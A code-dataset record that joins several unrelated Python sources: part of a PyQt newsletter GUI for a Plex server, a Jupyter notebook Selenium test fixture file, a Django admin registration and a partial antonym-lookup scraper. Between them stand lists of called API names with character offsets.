self.setColumnWidth( 0, int( 0.07 * width ) )
self.setColumnWidth( 1, int( 0.93 * width ) )
class EmailSendDialog( QDialogWithPrinting ):
def __init__( self, parent ):
super( HowdyEmailGUI.EmailSendDialog, self ).__init__(
parent, isIsolated = False, doQuit = False )
self.setModal( True )
self.verify = parent.verify
self.setWindowTitle( 'SEND EMAILS' )
self.emailSendDialogTableModel = HowdyEmailGUI.EmailSendDialogTableModel(
parent.emails_array, self.verify )
emailSendDialogTableView = HowdyEmailGUI.EmailSendDialogTableView(
self.emailSendDialogTableModel )
self.statusLabel = QLabel( )
#
myLayout = QVBoxLayout( )
self.setLayout( myLayout )
#
topLayout = QGridLayout( )
topWidget = QWidget( self )
topWidget.setLayout( topLayout )
topLayout.addWidget( self.emailSendDialogTableModel.selectTestButton, 0, 0, 1, 1 )
topLayout.addWidget( self.emailSendDialogTableModel.selectAllButton, 0, 1, 1, 1 )
topLayout.addWidget( self.emailSendDialogTableModel.sendEmailButton, 0, 2, 1, 1 )
#
topLayout.addWidget( QLabel( 'FILTER' ), 1, 0, 1, 1 )
topLayout.addWidget( self.emailSendDialogTableModel.filterOnNamesOrEmails, 1, 1, 1, 2 )
#
topLayout.addWidget( QLabel( 'SHOW EMAILS' ), 2, 0, 1, 1 )
topLayout.addWidget( self.emailSendDialogTableModel.showAllEmailsButton, 2, 1, 1, 1 )
topLayout.addWidget( self.emailSendDialogTableModel.showSelectedEmailsButton, 2, 2, 1, 1 )
myLayout.addWidget( topWidget )
#
myLayout.addWidget( emailSendDialogTableView )
#
botWidget = QWidget( )
botLayout = QHBoxLayout( )
botWidget.setLayout( botLayout )
botLayout.addWidget( self.statusLabel )
botLayout.addWidget( self.emailSendDialogTableModel.showingEmailsLabel )
myLayout.addWidget( botWidget )
#
self.emailSendDialogTableModel.statusSignal.connect( self.statusLabel.setText )
#
self.setFixedWidth( 500 )
self.setFixedHeight( 600 )
#self.setFixedWidth( self.sizeHint( ).width( ) )
#self.setFixedHeight( int( 0.5 * self.sizeHint( ).height( ) ) )
emailSendDialogTableView.resizeTableColumns( 500 )
self.hide( )
class PrePostAmbleDialog( QDialogWithPrinting ):
def __init__( self, parent, title = 'Preamble' ):
super( HowdyEmailGUI.PrePostAmbleDialog, self ).__init__(
parent, isIsolated = False )
self.parent = parent
self.sectionNameWidget = QLineEdit( titlecase.titlecase( title ) )
self.testTextButton = QPushButton( 'TEST TEXT' )
self.pngAddButton = QPushButton( 'ADD PNGS' )
self.textEdit = QTextEdit( )
self.statusLabel = QLabel( )
self.setWindowTitle( title )
self.setModal( True )
self.isValidRST = False
#
self.YesButton = QRadioButton( 'YES', self )
self.NoButton = QRadioButton( 'NO', self )
radioButtonsWidget = QWidget( )
radioButtonsLayout = QHBoxLayout( )
radioButtonsWidget.setLayout( radioButtonsLayout )
radioButtonsLayout.addWidget( self.YesButton )
radioButtonsLayout.addWidget( self.NoButton )
self.NoButton.toggle( )
#
self.pngWidget = email_basegui.PNGWidget( self )
self.pngWidget.hide( )
#
myLayout = QVBoxLayout( )
self.setLayout( myLayout )
#
topLayout = QGridLayout( )
topWidget = QWidget( )
topWidget.setLayout( topLayout )
topLayout.addWidget( QLabel( 'SECTION' ), 0, 0, 1, 1 )
topLayout.addWidget( self.sectionNameWidget, 0, 1, 1, 2 )
topLayout.addWidget( radioButtonsWidget, 1, 0, 1, 2 )
topLayout.addWidget( self.testTextButton, 1, 2, 1, 1 )
topLayout.addWidget( self.pngAddButton, 1, 3, 1, 1 )
myLayout.addWidget( topWidget )
#
myLayout.addWidget( self.textEdit )
myLayout.addWidget( self.statusLabel )
#
self.testTextButton.clicked.connect( self.checkRST )
self.pngAddButton.clicked.connect( self.addPNGs )
#
self.setFixedHeight( 650 )
self.setFixedWidth( self.sizeHint( ).width( ) )
def checkRST( self ):
self.statusLabel.setText( '' )
myStr = self.textEdit.toPlainText( ).strip( )
if len( myStr ) == 0:
self.statusLabel.setText( 'INVALID RESTRUCTUREDTEXT' )
self.isValidRST = False
return
sectionTitle = self.sectionNameWidget.text( ).strip( )
mainText = '\n'.join([ sectionTitle, ''.join([ '=' ] * len( sectionTitle )), '', myStr ])
if not check_valid_RST( mainText ):
self.statusLabel.setText( 'INVALID RESTRUCTUREDTEXT' )
self.isValidRST = False
return
self.isValidRST = True
html = convert_string_RST( mainText )
self.statusLabel.setText( 'VALID RESTRUCTUREDTEXT' )
#
qdl = QDialogWithPrinting( self, doQuit = False, isIsolated = True )
qdl.setWindowTitle( 'HTML EMAIL BODY' )
qte = HtmlView( qdl )
qter = QTextEdit( self )
qter.setReadOnly( True )
qter.setPlainText( '%s\n' % html )
qdlLayout = QVBoxLayout( )
qdl.setLayout( qdlLayout )
tw = QTabWidget( self )
tw.addTab( qte, 'RENDERED HTML' )
tw.addTab( qter, 'RAW HTML' )
qdlLayout.addWidget( tw )
qf = QFont( )
qf.setFamily( 'Consolas' )
qf.setPointSize( int( 11 ) )
qfm = QFontMetrics( qf )
qdl.setFixedWidth( 85 * qfm.width( 'A' ) )
qdl.setFixedHeight( 550 )
qte.setHtml( html )
qdl.show( )
#
##
result = qdl.exec_( )
def sendValidRST( self, showSection = False ):
if self.NoButton.isChecked( ): return ""
#
myStr = self.textEdit.toPlainText( ).strip( )
sectionTitle = self.sectionNameWidget.text( ).strip( )
if not showSection or len( sectionTitle ) == 0: mainText = myStr
else: mainText = '\n'.join([ sectionTitle, ''.join([ '=' ] * len( sectionTitle )), '', myStr ])
if not check_valid_RST( mainText ):
return ""
return mainText
def closeEvent( self, evt ):
self.hide( )
def addPNGs( self ):
self.pngWidget.show( )
def getHTML( self ):
sectionTitle = self.sectionNameWidget.text( ).strip( )
mainText = '\n'.join([
sectionTitle,
'\n'.join([ '=' ] * len( sectionTitle ) ), '',
self.textEdit.toPlainText( ).strip( ) ])
if not check_valid_RST( mainText ):
return False, None
#
html = convert_string_RST( mainText )
return True, html
def __init__( self, doLocal = True, doLarge = False, verify = True ):
super( HowdyEmailGUI, self ).__init__( None )
self.resolution = 1.0
self.verify = verify
self.htmlString = ''
if doLarge:
self.resolution = 2.0
for fontFile in glob.glob( os.path.join( resourceDir, '*.ttf' ) ):
QFontDatabase.addApplicationFont( fontFile )
self.setStyleSheet("""
QWidget {
font-family: Consolas;
font-size: %d;
}""" % ( int( 11 * self.resolution ) ) )
dat = core.checkServerCredentials(
doLocal = doLocal, verify = self.verify )
if dat is None:
raise ValueError( "Error, cannot access the Plex media server." )
self.fullURL, self.token = dat
#
self.checkEmailButton = QPushButton( 'CHECK EMAIL', self )
self.emailListButton = QPushButton( 'PLEX GUESTS', self )
#
self.preambleButton = QPushButton( 'PREAMBLE', self )
self.postambleButton = QPushButton( 'POSTAMBLE', self )
#
self.emailDialogButton = QPushButton( 'EMAIL DIALOG', self )
#
self.emailDialogButton.setEnabled( False )
self.checkEmailButton.setEnabled( True )
self.emailComboBox = QComboBox( )
#
self.setWindowTitle( 'HOWDY EMAIL NEWSLETTER' )
self.preambleDialog = HowdyEmailGUI.PrePostAmbleDialog( self, title = 'PREAMBLE' )
self.postambleDialog = HowdyEmailGUI.PrePostAmbleDialog( self, title = 'POSTAMBLE' )
self.preamble = ''
self.postamble = ''
self.getContacts( self.token )
myLayout = QGridLayout( )
self.setLayout( myLayout )
#
self.emails_array = [( emailName, emailAddress ), ] + get_email_contacts_dict(
core.get_mapped_email_contacts(
self.token, verify = self.verify ), verify = self.verify )
self.emailSendDialog = HowdyEmailGUI.EmailSendDialog( self )
#
myLayout.addWidget( self.checkEmailButton, 0, 0, 1, 1 )
myLayout.addWidget( self.emailDialogButton, 0, 1, 1, 1 )
myLayout.addWidget( self.preambleButton, 1, 0, 1, 1 )
myLayout.addWidget( self.postambleButton, 1, 1, 1, 1 )
myLayout.addWidget( self.emailListButton, 2, 0, 1, 2 )
#
self.checkEmailButton.clicked.connect( self.createSummaryEmail )
self.preambleButton.clicked.connect( self.preambleDialog.show )
self.postambleButton.clicked.connect( self.postambleDialog.show )
self.emailDialogButton.clicked.connect( self.emailSendDialog.show )
self.emailListButton.clicked.connect( self.showEmails )
#
self.show( )
def showEmails( self ):
qdl = QDialogWithPrinting( self, doQuit = False, isIsolated = True )
qdl.setModal( True )
qdl.setWindowTitle( 'PLEX MAPPED GUEST EMAILS' )
myLayout = QVBoxLayout( )
qdl.setLayout( myLayout )
def email_name_dict( tup ):
name, email = tup
data_dict = { 'email' : email }
if name is not None:
data_dict[ 'name' ] = name
return data_dict
emailMapping = list(
map( email_name_dict, self.emails_array ) )
pgetv = HowdyGuestEmailTV(
qdl, emailMapping, self.resolution )
myLayout.addWidget( pgetv )
qdl.setFixedWidth( pgetv.totalWidth )
qdl.setFixedHeight( pgetv.totalHeight )
qdl.show( )
result = qdl.exec_( )
def createSummaryEmail( self ):
self.emailDialogButton.setEnabled( False )
preambleText = self.preambleDialog.sendValidRST( True )
postambleText = self.postambleDialog.sendValidRST( True )
self.htmlString, self.restructuredTextString = email.get_summary_html(
self.token, fullURL = self.fullURL,
preambleText = preambleText, postambleText = postambleText )
if len( self.htmlString ) == 0: return
#
qdl = QDialogWithPrinting( self, doQuit = False, isIsolated = True )
qdl.setWindowTitle( 'HTML EMAIL BODY' )
qte = HtmlView( qdl )
qter = QTextEdit( self )
qter.setReadOnly( True )
qter.setPlainText( '%s\n' % self.htmlString )
qterst = QTextEdit( self )
qterst.setReadOnly( True )
qterst.setPlainText( '%s\n' % self.restructuredTextString )
qdlLayout = QVBoxLayout( )
qdl.setLayout( qdlLayout )
tw = QTabWidget( self )
tw.addTab( qte, 'RENDERED HTML' )
tw.addTab( qter, 'RAW HTML' )
tw.addTab( qterst, 'RESTRUCTURED TEXT' )
qdlLayout.addWidget( tw )
qf = QFont( )
qf.setFamily( 'Consolas' )
qf.setPointSize( int( 11 ) )
qfm = QFontMetrics( qf )
qdl.setFixedWidth( 85 * qfm.width( 'A' ) )
qdl.setFixedHeight( 550 )
qte.setHtml( self.htmlString )
qdl.show( )
#
##
result = qdl.exec_( )
self.emailDialogButton.setEnabled( True )
# self.testEmailButton.setEnabled( True )
def emailDialog( self ):
qd = HowdyEmailGUI.EmailSendDialog( self )
result = qd.exec_( )
def getContacts( self, token ):
emails = core.get_mapped_email_contacts(
token, verify = self.verify )
if len(emails) == 0: return
self.checkEmailButton.setEnabled( True )
#
## now do some google client magic to get the names
name_emails = get_email_contacts_dict(
emails, verify = self.verify )
self.emailComboBox.clear( )
def get_email( input_tuple ):
name, email = input_tuple
if name is not None:
return '%s <%s>' % ( name, email )
return email
self.emailComboBox.addItems(
sorted( map( get_email, name_emails ) ) )
self.emailComboBox.setEditable( False )
self.emailComboBox.setCurrentIndex( 0 )
|
[
"titlecase.titlecase",
"howdy.email.email_basegui.PNGWidget",
"howdy.email.email.send_individual_email_full",
"howdy.core.check_valid_RST",
"howdy.core.core.get_mapped_email_contacts",
"os.path.join",
"howdy.core.core.set_date_newsletter",
"howdy.core.QDialogWithPrinting",
"datetime.datetime.now",
"pathos.multiprocessing.cpu_count",
"howdy.core.convert_string_RST",
"howdy.core.HtmlView",
"howdy.email.get_email_contacts_dict",
"howdy.email.email_mygui.HowdyGuestEmailTV",
"howdy.email.email.get_summary_html",
"time.time",
"email.utils.formataddr",
"howdy.core.core.checkServerCredentials",
"howdy.email.get_email_service"
] |
[((20795, 20859), 'howdy.core.core.checkServerCredentials', 'core.checkServerCredentials', ([], {'doLocal': 'doLocal', 'verify': 'self.verify'}), '(doLocal=doLocal, verify=self.verify)\n', (20822, 20859), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((22997, 23053), 'howdy.core.QDialogWithPrinting', 'QDialogWithPrinting', (['self'], {'doQuit': '(False)', 'isIsolated': '(True)'}), '(self, doQuit=False, isIsolated=True)\n', (23016, 23053), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((23530, 23583), 'howdy.email.email_mygui.HowdyGuestEmailTV', 'HowdyGuestEmailTV', (['qdl', 'emailMapping', 'self.resolution'], {}), '(qdl, emailMapping, self.resolution)\n', (23547, 23583), False, 'from howdy.email.email_mygui import HowdyGuestEmailTV\n'), ((24051, 24168), 'howdy.email.email.get_summary_html', 'email.get_summary_html', (['self.token'], {'fullURL': 'self.fullURL', 'preambleText': 'preambleText', 'postambleText': 'postambleText'}), '(self.token, fullURL=self.fullURL, preambleText=\n preambleText, postambleText=postambleText)\n', (24073, 24168), False, 'from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service\n'), ((24267, 24323), 'howdy.core.QDialogWithPrinting', 'QDialogWithPrinting', (['self'], {'doQuit': '(False)', 'isIsolated': '(True)'}), '(self, doQuit=False, isIsolated=True)\n', (24286, 24323), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((24392, 24405), 'howdy.core.HtmlView', 'HtmlView', (['qdl'], {}), '(qdl)\n', (24400, 24405), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((25517, 25574), 'howdy.core.core.get_mapped_email_contacts', 'core.get_mapped_email_contacts', (['token'], {'verify': 'self.verify'}), '(token, verify=self.verify)\n', (25547, 25574), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((25768, 25819), 'howdy.email.get_email_contacts_dict', 'get_email_contacts_dict', (['emails'], {'verify': 'self.verify'}), '(emails, verify=self.verify)\n', (25791, 25819), False, 'from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service\n'), ((7480, 7491), 'time.time', 'time.time', ([], {}), '()\n', (7489, 7491), False, 'import os, sys, titlecase, datetime, json, re, urllib, time, glob\n'), ((7588, 7625), 'howdy.email.get_email_service', 'get_email_service', ([], {'verify': 'self.verify'}), '(verify=self.verify)\n', (7605, 7625), False, 'from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service\n'), ((16356, 16385), 'howdy.email.email_basegui.PNGWidget', 'email_basegui.PNGWidget', (['self'], {}), '(self)\n', (16379, 16385), False, 'from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service\n'), ((18098, 18126), 'howdy.core.convert_string_RST', 'convert_string_RST', (['mainText'], {}), '(mainText)\n', (18116, 18126), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((18226, 18282), 'howdy.core.QDialogWithPrinting', 'QDialogWithPrinting', (['self'], {'doQuit': '(False)', 'isIsolated': '(True)'}), '(self, doQuit=False, isIsolated=True)\n', (18245, 18282), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((18359, 18372), 'howdy.core.HtmlView', 'HtmlView', (['qdl'], {}), '(qdl)\n', (18367, 18372), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((20153, 20181), 'howdy.core.convert_string_RST', 'convert_string_RST', (['mainText'], {}), '(mainText)\n', (20171, 20181), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((20532, 20566), 'os.path.join', 'os.path.join', (['resourceDir', '"""*.ttf"""'], {}), "(resourceDir, '*.ttf')\n", (20544, 20566), False, 'import os, sys, titlecase, datetime, json, re, urllib, time, glob\n'), ((7927, 8039), 'howdy.email.email.send_individual_email_full', 'email.send_individual_email_full', (['self.mainHtml', 'subject', 'fullEmail'], {'name': 'name', 'email_service': 'email_service'}), '(self.mainHtml, subject, fullEmail, name=\n name, email_service=email_service)\n', (7959, 8039), False, 'from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service\n'), ((8604, 8630), 'howdy.core.core.set_date_newsletter', 'core.set_date_newsletter', ([], {}), '()\n', (8628, 8630), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((15536, 15562), 'titlecase.titlecase', 'titlecase.titlecase', (['title'], {}), '(title)\n', (15555, 15562), False, 'import os, sys, titlecase, datetime, json, re, urllib, time, glob\n'), ((17881, 17906), 'howdy.core.check_valid_RST', 'check_valid_RST', (['mainText'], {}), '(mainText)\n', (17896, 17906), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((19543, 19568), 'howdy.core.check_valid_RST', 'check_valid_RST', (['mainText'], {}), '(mainText)\n', (19558, 19568), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((20056, 20081), 'howdy.core.check_valid_RST', 'check_valid_RST', (['mainText'], {}), '(mainText)\n', (20071, 20081), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((22051, 22113), 'howdy.core.core.get_mapped_email_contacts', 'core.get_mapped_email_contacts', (['self.token'], {'verify': 'self.verify'}), '(self.token, verify=self.verify)\n', (22081, 22113), False, 'from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView\n'), ((6107, 6132), 'email.utils.formataddr', 'formataddr', (['(name, email)'], {}), '((name, email))\n', (6117, 6132), False, 'from email.utils import formataddr\n'), ((7651, 7674), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7672, 7674), False, 'import os, sys, titlecase, datetime, json, re, urllib, time, glob\n'), ((8181, 8208), 'pathos.multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (8206, 8208), True, 'import pathos.multiprocessing as multiprocessing\n'), ((8444, 8455), 'time.time', 'time.time', ([], {}), '()\n', (8453, 8455), False, 'import os, sys, titlecase, datetime, json, re, urllib, time, glob\n')]
|
import json
import os
import pytest
import requests
from subprocess import Popen
import sys
from testpath.tempdir import TemporaryDirectory
import time
from urllib.parse import urljoin
from selenium.webdriver import Firefox, Remote, Chrome
from .utils import Notebook
pjoin = os.path.join
def _wait_for_server(proc, info_file_path):
"""Wait 30 seconds for the notebook server to start"""
for i in range(300):
if proc.poll() is not None:
raise RuntimeError("Notebook server failed to start")
if os.path.exists(info_file_path):
try:
with open(info_file_path) as f:
return json.load(f)
except ValueError:
# If the server is halfway through writing the file, we may
# get invalid JSON; it should be ready next iteration.
pass
time.sleep(0.1)
raise RuntimeError("Didn't find %s in 30 seconds", info_file_path)
@pytest.fixture(scope='session')
def notebook_server():
info = {}
with TemporaryDirectory() as td:
nbdir = info['nbdir'] = pjoin(td, 'notebooks')
os.makedirs(pjoin(nbdir, u'sub ∂ir1', u'sub ∂ir 1a'))
os.makedirs(pjoin(nbdir, u'sub ∂ir2', u'sub ∂ir 1b'))
info['extra_env'] = {
'JUPYTER_CONFIG_DIR': pjoin(td, 'jupyter_config'),
'JUPYTER_RUNTIME_DIR': pjoin(td, 'jupyter_runtime'),
'IPYTHONDIR': pjoin(td, 'ipython'),
}
env = os.environ.copy()
env.update(info['extra_env'])
command = [sys.executable, '-m', 'notebook',
'--no-browser',
'--notebook-dir', nbdir,
# run with a base URL that would be escaped,
# to test that we don't double-escape URLs
'--NotebookApp.base_url=/a@b/',
]
print("command=", command)
proc = info['popen'] = Popen(command, cwd=nbdir, env=env)
info_file_path = pjoin(td, 'jupyter_runtime',
'nbserver-%i.json' % proc.pid)
info.update(_wait_for_server(proc, info_file_path))
print("Notebook server info:", info)
yield info
# Shut the server down
requests.post(urljoin(info['url'], 'api/shutdown'),
headers={'Authorization': 'token '+info['token']})
def make_sauce_driver():
"""This function helps travis create a driver on Sauce Labs.
This function will err if used without specifying the variables expected
in that context.
"""
username = os.environ["SAUCE_USERNAME"]
access_key = os.environ["SAUCE_ACCESS_KEY"]
capabilities = {
"tunnel-identifier": os.environ["TRAVIS_JOB_NUMBER"],
"build": os.environ["TRAVIS_BUILD_NUMBER"],
"tags": [os.environ['TRAVIS_PYTHON_VERSION'], 'CI'],
"platform": "Windows 10",
"browserName": os.environ['JUPYTER_TEST_BROWSER'],
"version": "latest",
}
if capabilities['browserName'] == 'firefox':
# Attempt to work around issue where browser loses authentication
capabilities['version'] = '57.0'
hub_url = "%s:%s@localhost:4445" % (username, access_key)
print("Connecting remote driver on Sauce Labs")
driver = Remote(desired_capabilities=capabilities,
command_executor="http://%s/wd/hub" % hub_url)
return driver
@pytest.fixture(scope='session')
def selenium_driver():
if os.environ.get('SAUCE_USERNAME'):
driver = make_sauce_driver()
elif os.environ.get('JUPYTER_TEST_BROWSER') == 'chrome':
driver = Chrome()
else:
driver = Firefox()
yield driver
# Teardown
driver.quit()
@pytest.fixture(scope='module')
def authenticated_browser(selenium_driver, notebook_server):
selenium_driver.jupyter_server_info = notebook_server
selenium_driver.get("{url}?token={token}".format(**notebook_server))
return selenium_driver
@pytest.fixture
def notebook(authenticated_browser):
return Notebook.new_notebook(authenticated_browser)
|
[
"subprocess.Popen",
"json.load",
"urllib.parse.urljoin",
"selenium.webdriver.Firefox",
"os.environ.copy",
"pytest.fixture",
"os.path.exists",
"time.sleep",
"os.environ.get",
"selenium.webdriver.Remote",
"testpath.tempdir.TemporaryDirectory",
"selenium.webdriver.Chrome"
] |
[((968, 999), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""session"""'}), "(scope='session')\n", (982, 999), False, 'import pytest\n'), ((3403, 3434), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""session"""'}), "(scope='session')\n", (3417, 3434), False, 'import pytest\n'), ((3715, 3745), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (3729, 3745), False, 'import pytest\n'), ((3273, 3366), 'selenium.webdriver.Remote', 'Remote', ([], {'desired_capabilities': 'capabilities', 'command_executor': "('http://%s/wd/hub' % hub_url)"}), "(desired_capabilities=capabilities, command_executor=\n 'http://%s/wd/hub' % hub_url)\n", (3279, 3366), False, 'from selenium.webdriver import Firefox, Remote, Chrome\n'), ((3465, 3497), 'os.environ.get', 'os.environ.get', (['"""SAUCE_USERNAME"""'], {}), "('SAUCE_USERNAME')\n", (3479, 3497), False, 'import os\n'), ((534, 564), 'os.path.exists', 'os.path.exists', (['info_file_path'], {}), '(info_file_path)\n', (548, 564), False, 'import os\n'), ((878, 893), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (888, 893), False, 'import time\n'), ((1046, 1066), 'testpath.tempdir.TemporaryDirectory', 'TemporaryDirectory', ([], {}), '()\n', (1064, 1066), False, 'from testpath.tempdir import TemporaryDirectory\n'), ((1484, 1501), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (1499, 1501), False, 'import os\n'), ((1937, 1971), 'subprocess.Popen', 'Popen', (['command'], {'cwd': 'nbdir', 'env': 'env'}), '(command, cwd=nbdir, env=env)\n', (1942, 1971), False, 'from subprocess import Popen\n'), ((2259, 2295), 'urllib.parse.urljoin', 'urljoin', (["info['url']", '"""api/shutdown"""'], {}), "(info['url'], 'api/shutdown')\n", (2266, 2295), False, 'from urllib.parse import urljoin\n'), ((3545, 3583), 'os.environ.get', 'os.environ.get', (['"""JUPYTER_TEST_BROWSER"""'], {}), "('JUPYTER_TEST_BROWSER')\n", (3559, 3583), False, 'import os\n'), ((3614, 3622), 'selenium.webdriver.Chrome', 'Chrome', ([], {}), '()\n', (3620, 3622), False, 'from selenium.webdriver import Firefox, Remote, Chrome\n'), ((3650, 3659), 'selenium.webdriver.Firefox', 'Firefox', ([], {}), '()\n', (3657, 3659), False, 'from selenium.webdriver import Firefox, Remote, Chrome\n'), ((658, 670), 'json.load', 'json.load', (['f'], {}), '(f)\n', (667, 670), False, 'import json\n')]
|
from django.contrib import admin
from .models import Category, Post, Author
admin.site.register(Category)
admin.site.register(Post)
admin.site.register(Author)
# Register your models here.
|
[
"django.contrib.admin.site.register"
] |
[((77, 106), 'django.contrib.admin.site.register', 'admin.site.register', (['Category'], {}), '(Category)\n', (96, 106), False, 'from django.contrib import admin\n'), ((107, 132), 'django.contrib.admin.site.register', 'admin.site.register', (['Post'], {}), '(Post)\n', (126, 132), False, 'from django.contrib import admin\n'), ((133, 160), 'django.contrib.admin.site.register', 'admin.site.register', (['Author'], {}), '(Author)\n', (152, 160), False, 'from django.contrib import admin\n')]
|
#!/usr/bin/env python3
"""
This Python script is designed to query multiple online repositories for the
antonyms associated with a specific word.
"""
__author__ = '<NAME>'
__date__ = 'October 15, 2020'
__status__ = 'Production'
__license__ = 'MIT'
__copyright__ = "Copyright (C) 2020 <NAME>"
##################################################################################
# Date Completed: October 15, 2020
# Author: <NAME>
#
# Date Last Revised: September 17, 2021
# Revised by: <NAME>
##################################################################################
##################################################################################
# “AS-IS” Clause
#
# Except as represented in this agreement, all work produced by Developer is
# provided “AS IS”. Other than as provided in this agreement, Developer makes no
# other warranties, express or implied, and hereby disclaims all implied warranties,
# including any warranty of merchantability and warranty of fitness for a particular
# purpose.
##################################################################################
##################################################################################
# Python imports required for basic operations
##################################################################################
import bs4
import logging
import traceback
import re as regex
from bs4 import BeautifulSoup
from backoff import on_exception, expo
from ratelimit import limits, RateLimitException
from wordhoard.utilities.basic_soup import Query
from wordhoard.utilities import caching, cleansing, word_verification
logger = logging.getLogger(__name__)
class Antonyms(object):
"""
This class is used to query multiple online repositories for the antonyms associated
with a specific word.
"""
def __init__(self, search_string='',
output_format='list',
max_number_of_requests=30,
rate_limit_timeout_period=60,
proxies=None):
"""
Usage Examples
----------
>>> antonym = Antonyms('mother')
>>> results = antonym.find_antonyms()
>>> antonym = Antonyms(search_string='mother')
>>> results = antonym.find_antonyms()
Parameters
----------
:param search_string: String containing the variable to obtain antonyms for
:param output_format: Format to use for returned results. Default value: list; Acceptable values: dictionary or list
:param max_number_of_requests: Maximum number of requests for a specific timeout_period
:param rate_limit_timeout_period: The time period before a session is placed in a temporary hibernation mode
:param proxies: Dictionary of proxies to use with Python Requests
"""
self._word = search_string
self._output_format = output_format
self._proxies = proxies
ratelimit_status = False
self._rate_limit_status = ratelimit_status
# Retries the requests after a certain time period has elapsed
handler = on_exception(expo, RateLimitException, max_time=60, on_backoff=self._backoff_handler)
# Establishes a rate limit for making requests to the antonyms repositories
limiter = limits(calls=max_number_of_requests, period=rate_limit_timeout_period)
self.find_antonyms = handler(limiter(self.find_antonyms))
def _colorized_text(self, r, g, b, text):
return f"\033[38;2;{r};{g};{b}m{text} \033[38;2;255;255;255m"
def _backoff_handler(self, details):
if self._rate_limit_status is False:
print(self._colorized_text(255, 0, 0,
'The antonyms query rate Limit was reached. The querying process is entering a '
'temporary hibernation mode.'))
logger.info('The antonyms query rate limit was reached.')
self._rate_limit_status = True
def _validate_word(self):
"""
This function is designed to validate that the syntax for
a string variable is in an acceptable format.
:return: True or False
:rtype: boolean
"""
valid_word = word_verification.validate_word_syntax(self._word)
if valid_word:
return valid_word
else:
logger.error(f'The word {self._word} was not in a valid format.')
logger.error(f'Please verify that the word {self._word} is spelled correctly.')
def _check_cache(self):
check_cache = caching.cache_antonyms(self._word)
return check_cache
def _update_cache(self, antonyms):
caching.insert_word_cache_antonyms(self._word, antonyms)
return
def find_antonyms(self):
"""
Purpose
----------
This function queries multiple online repositories to discover antonyms
associated with the specific word provided to the Class Antonyms.
The antonyms are deduplicated and sorted alphabetically.
Returns
----------
:returns:
antonyms: list of antonyms
:rtype: list
"""
valid_word = self._validate_word()
if valid_word:
check_cache = self._check_cache()
if check_cache is False:
antonyms_01 = self._query_thesaurus_com()
antonyms_02 = self._query_wordhippo()
antonyms = ([x for x in [antonyms_01, antonyms_02] if x is not None])
antonyms_results = cleansing.flatten_multidimensional_list(antonyms)
if not antonyms_results:
return f'No antonyms were found for the word: {self._word}'
else:
if self._output_format == 'list':
return sorted(set(antonyms_results))
elif self._output_format == 'dictionary':
output_dict = {self._word: sorted(set(antonyms_results))}
return output_dict
else:
antonyms = cleansing.flatten_multidimensional_list([val for val in check_cache.values()])
if self._output_format == 'list':
return sorted(set(antonyms))
elif self._output_format == 'dictionary':
output_dict = {self._word: sorted(set(antonyms))}
return output_dict
else:
return f'Please verify that the word {self._word} is spelled correctly.'
def _query_thesaurus_com(self):
"""
This function queries thesaurus.com for antonyms associated
with the specific word provided to the Class Antonyms.
:returns:
antonyms: list of antonyms
:rtype: list
:raises
AttributeError: Raised when an attribute reference or assignment fails.
IndexError: Raised when a sequence subscript is out of range
KeyError: Raised when a mapping (dictionary) key is not found in the set of existing keys.
TypeError: Raised when an operation or function is applied to an object of inappropriate type.
bs4.FeatureNotFound: raised by the BeautifulSoup constructor if no parser with the requested features
is found
"""
try:
antonyms = []
if self._proxies is None:
response = Query(f'https://www.thesaurus.com/browse/{self._word}').get_single_page_html()
if response.status_code == 404:
logger.info(f'Thesaurus.com had no antonym reference for the word {self._word}')
else:
soup = BeautifulSoup(response.text, "lxml")
if soup.find("div", {'id': 'antonyms'}):
parent_tag = soup.find_all("div", {'data-testid': 'word-grid-container'})[1]
for link in parent_tag.find_all('a', {'class': 'css-pc0050'}):
antonyms.append(link.text.strip())
antonyms = sorted([x.lower() for x in antonyms])
self._update_cache(antonyms)
return antonyms
else:
logger.info(f'Thesaurus.com had no antonym reference for the word {self._word}')
elif self._proxies is not None:
response = Query(f'https://www.thesaurus.com/browse/{self._word}', self._proxies).get_single_page_html()
if response.status_code == 404:
logger.info(f'Thesaurus.com had no antonym reference for the word {self._word}')
else:
soup = BeautifulSoup(response.text, "lxml")
if soup.find("div", {'id': 'antonyms'}):
parent_tag = soup.find_all("div", {'data-testid': 'word-grid-container'})[1]
for link in parent_tag.find_all('a', {'class': 'css-pc0050'}):
antonyms.append(link.text.strip())
antonyms = sorted([x.lower() for x in antonyms])
self._update_cache(antonyms)
return antonyms
else:
